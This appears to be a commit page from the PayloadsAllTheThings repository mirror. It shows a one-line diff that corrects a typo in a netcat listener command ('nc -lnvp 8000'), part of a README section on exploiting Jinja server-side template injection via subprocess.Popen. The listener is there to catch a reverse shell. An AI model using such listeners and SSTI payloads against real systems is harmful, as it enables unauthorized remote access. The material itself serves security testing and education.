1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-05-22 08:06:04 +02:00

Update README.md

This commit is contained in:
Swissky 2021-01-31 21:51:53 +01:00 committed by GitHub
parent b4d8b5939f
commit 6bcd2e8a6a
Signed by: GitHub
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -396,7 +396,7 @@ Source: https://jinja.palletsprojects.com/en/2.11.x/templates/#debug-statement
Listen for connection
```bash
nv -lnvp 8000
nc -lnvp 8000
```
#### Exploit the SSTI by calling subprocess.Popen.